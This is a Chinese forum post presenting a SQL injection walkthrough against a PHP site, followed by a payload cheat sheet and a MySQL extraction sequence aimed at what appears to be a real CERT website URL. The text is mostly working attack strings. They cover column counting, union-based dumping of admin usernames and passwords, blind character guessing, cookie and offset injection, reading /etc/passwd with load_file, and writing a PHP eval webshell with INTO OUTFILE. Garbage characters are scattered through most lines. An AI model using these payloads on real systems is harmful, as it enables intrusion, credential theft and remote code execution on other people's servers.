我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~( P! F$ N3 \; [' j. c6 I7 J
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
- ~/ l, j) @* b我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
+ \/ A0 |1 f5 ]+ J; B$ @如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。). P% B& u3 J1 `( `
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)# ]. y. z& u* x- _0 @( d) _- }
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:+ k$ S, q! }0 k$ F; d! c
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in' {7 x( _9 ?2 V% W' T* n) ~
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入! [4 z& \& m7 M
1 G2 C& q }/ T& `. I) K
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
$ x5 d' M3 m+ G, v3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意. B% m' T7 o- U9 ]0 Z2 a, y" Y$ r# a
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息# H, D% S7 j- }5 V4 Z7 V
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。$ I5 m a5 ?5 D8 z& }/ l) m# F/ h
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell, g' l/ v i0 N2 i8 p1 C
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。" ?! D' Y/ _+ K" P. D2 F
我就用的是第二个思路,% [/ X- o: W' g) x- _, J5 A M @
提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- ; Z* M- O+ |" U" f" {8 u1 R
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
' o0 J" w# `" e# h7 o$ j/ Z提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
5 ]+ T# ~# Z( n7 h# P注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
% M9 u ^( d4 V8 p$ q/ z9 M5 I7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
! T$ q7 g3 P5 Q8 i2 r/ D是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd...../ T, z. C6 j" h$ N9 N: k2 v5 Y; m
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
, \$ l9 i. J2 {, o! J; Y然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
' W# e6 ?# @0 W- }& g调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......5 \, ~2 U' ~# j1 N( M5 F, D! S
下面是一些很普遍注入方式资料:1 x% w" Q( p; Q" @
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='& ]4 b) c, z# x* b
拆半法
& I7 [" D; i; z _* }1 w( P2 D######################################$ m6 h! h S# J% d m
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
( s b6 g6 ~3 `- Z' band exists (select * from admin)
5 W# `" L; W" G9 C2 p" Q; f s! wand exists(select id from admin)7 O6 E9 A/ \$ Q: W- i
and exists(select id from admin where id=1)6 ]* E3 W% \" e' Q# p" L
and exists(select id from admin where id>1) : O6 Q- `" C4 G* I6 D$ [1 }! O
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
* h, h4 I) j+ F7 G Pand exists (select username from admin)9 N6 i3 M2 P* k, O; R
and exists (select password from admin)
# E1 a# ~, H2 Z! B: V g$ x3 ~and exists (select id from admin where len(username)<10 and id=1)( e5 ~& N1 R1 p. \/ R# _& L
and exists (select id from admin where len(username)>5 and id=1)2 e7 k2 d, u$ F4 i
and exists (select id from admin where len(username)=6 and id=1)3 G) c# ~: P- U# c
and exists (select id from admin where len(password)<10 and id=1)5 r% G; e9 i4 w& O- N3 g
and exists (select id from admin where len(password)>5 and id=1)
7 V0 A2 B0 B. T" z, \3 `and exists (select id from admin where len(password)=7 and id=1)& D" u" C1 a1 x
and (select top 1 asc(mid(username,1,1)) from admin)=97# @: `6 d! k( j. T3 k3 }* D
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
% j# H2 b8 {+ q! e3 ~猜第二位把username,1,1改成username,2,1就可以了。
3 R' ?" B+ M/ i Y- G猜密码把username改成password就OK了
, r$ S" ^0 A3 R! D1 r##################################################) s) Y; R4 e2 I! o0 T+ ^; j9 N" Z
搜索型注入# W- V9 r% p( B9 @$ e
##################################
& U/ Q# o7 Z8 V%' and 1=1 and '%'='' l$ P: B' P l ~; W
%' and exists (select * from admin) and '%'='8 G: e; `4 K4 d% R% H' v; @: ~ E" V( L
%' and exists(select id from admin where id=1) and '%'='
1 [7 _ w- E3 |, ~1 J: Z+ s%' and exists (select id from admin where len(username)<10 and id=1) and '%'='% j$ A, O: X5 Y: r5 {
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='2 p( z5 A4 I ~
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='7 L" I8 Q; w9 I+ G! w+ Y
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
+ I' ^1 P9 \7 a对于MSSQL数据库,后面可以吧 and '%'='换成--
2 D1 Z" |2 m# h/ {" R还有一点搜索型注入也可以使用union语句。8 ~( b+ i E" [' L
########################################################
; g. y4 m5 o7 ^* ~" f, n7 D联合查询。0 z2 Q2 v- A& n3 V0 L6 ^
#####################################, j* i6 ^- z. B! e% L
order by 10) d+ E+ ^% I4 f; N/ t
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
+ d! {" V* O9 ], k/ q* J! Rand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
( B3 q$ d8 S) G: q! S; u" x3 _and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=16 B l" @6 K- M* A! l
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)6 l5 {7 J$ @9 A$ c0 q7 F' a
###################################* }+ M! P- L3 s& F, W6 K6 O
cookie注入
. t) z# C/ Q+ v8 J' k###############################$ c( D# R- h% b! r, T2 }
http://www.******.com/shownews.asp?id=127
3 ?7 O% C8 Q+ W* G1 a7 @/ Vhttp://www.******.com/shownews.asp* W. w+ P5 \8 J/ c$ o1 N) Y
alert(="id="+escape("127"));
1 Y+ u- J+ o1 t. @6 _& |alert(="id="+escape("127 and 1=1"));
; k1 L+ w) r& t; K8 L& P' w1 Oalert(="id="+escape("127 order by 10"));4 d, M# H: O# |' a( Z0 f0 I9 w
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
* h5 d8 q- g: K% Y6 O1 Halert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
: X0 S- Y1 m1 E' k; N7 m这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
# O6 T3 ?% V r2 q1 o7 R- O: o, j###################################
( o7 ]4 Z: v! b* J偏移注入; Z2 `' T9 P, t
###########################################################
( q. G. [# W9 j7 R, J6 x( x' ^union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin* K" M$ q& z5 j f$ D. P
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin! m8 `* }/ [& p. x U9 u d
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)& N$ p1 w8 M, R- S" l q, N% U9 i: k! `
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
+ b: e' J. d$ Q9 e* Q6 }union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)6 a* G, N9 }4 U" x
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
6 V% m7 s# d% H3 @union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on, i1 [2 ^1 g# L* s
a.id=d.id)
. M5 o- l6 `$ t; i5 hand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
2 C% Q3 N( g% u. ~, Band 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) 9 A: P. r7 Y7 k5 j- q+ O, ^
) X7 E) C4 B3 }( l- m( g============================================================================================================( L0 j9 I) T- r- c3 c5 q+ x
1.判断版本- p9 |7 ]) C! E( }, v) l8 d7 E8 D
and ord(mid(version(),1,1))>51! j! P$ n; B. N$ Q2 w' ]6 A$ u0 b
返回正常,说明大于4.0版本,支持ounion查询
. _- f% E1 A8 `5 q! a% i2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
/ g% z+ D0 Y- x7 A' l6 Kand 2=4 union select 1,2,3,4,5,6,7,8,9--( q) _# Y& W6 R) U4 f
3.查看数据库版本及当前用户,9 q. S z! y7 I& L& d
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
7 P7 v s, e7 @, M' g `# E7 Y数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
_" _$ q: f2 y, J5 i, ^4.判断有没有写权限0 O$ _! j# B! v1 o$ O: V4 x
and (select count(*) from MySQL.user)>0-- " m+ S3 l5 {8 C* `0 ~& Q6 k3 n
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,16 n0 j- h2 J Z' N
用不了这个命令,就学习土耳其黑客手法,如下 P7 T; b% k/ ]8 E
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
$ c; ~& k. A( O# v) M6.爆表,爆库
. G& C) s" s5 i( s) J. N3 tand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
# F3 }+ l( x. z% d3 v3 u7.爆列名,爆表
& D# i4 B5 [# W7 \and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
. n( q x4 z' `* Z) y8.查询字段数,直接用limit N,1去查询,直接N到报错为止。# ]/ b$ p1 r5 N E( v
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
0 J/ K _6 I% C( W/ p9 M; A9.爆字段内容
& T$ F% b& c+ N6 I6 J d/ {$ ^! \and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
4 x, L$ R& [. Bhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |